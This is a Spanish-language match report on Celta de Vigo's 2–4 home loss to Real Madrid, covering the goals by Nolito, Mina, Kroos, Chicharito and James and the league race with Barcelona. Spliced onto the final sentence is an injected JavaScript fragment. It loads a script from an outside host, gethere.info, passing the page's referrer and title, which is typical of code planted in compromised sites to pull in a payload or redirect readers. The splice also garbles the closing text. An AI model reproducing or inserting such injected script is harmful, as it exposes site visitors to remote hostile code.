Victoria sufrida de los blancos por el pulso de la Liga

Crónica: Kelia Vidarte/LaTribunamadridista.com  (Jornada 33. Liga BBVA Celta 2 vs Real Madrid 4)

Los hombres de Ancelotti han tenido un encuentro trabajado frente al Celta de Vigo, que estuvo muy peleón y fue a por el partido desde el primer minuto. Los 4 goles madridistas sirvieron para seguir con el pulso de la Liga frente al FC Barcelona que sigue sin desmarcarse del liderato.

El esfuerzo de ambos equipos ha sido digno de admirar. El Celta no ha bajado nunca los brazos y el Madrid, tras su derroche en la Champions frente al Atlético, ha mostrado un gran tono físico.

Los dos equipos buscaron la portería en la primera mitad y dejaron cinco goles en 45 minutos. El marcador fue inaugurado por Nolito al que Kroos respondió con el empate. Posteriormente el Madrid se adelantó gracias a un tanto de Chicharito y Santi Mina logró el empate, pero James, a dos minutos del descanso, puso en ventaja otra vez a los visitantes.

El ritmo del primer tiempo fue trepidante, ninguno de los dos equipos quiso ceder y los madridistas fueron letales a la contra.

En el segundo tiempo los locales salieron con el cuchillo entre los dientes, un Celta desatado en ataque y un Madrid buscando la sentencia con contragolpes veloces y en su mayoría en ventaja numérica. Mina y Larrivey tuvieron la opción de empatar, pero finalmente fue Chicharito, que se encuentra en estado imparable y que en estos últimos encuentros nos ha enamorado a todos los madridistas, quien completó su semana de ensueño para hacer el cuarto y sentenciar el partido.

Un Real Madrid que empezó perdiendo y ya al descanso supo darle la vuelta al marcador.Partidazo el que hemos visto en Balaídos, de donde el Real Madrid arranca tres puntos importantísimos en un pulso con el Barcelona por el título de Liga. El conjunto de Ancelotti sigue presionando al de Luis Enrique y mantiene la distancia de dos puntos gracias a los goles de Kroos, Chicharito (dos) y James.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;

About admin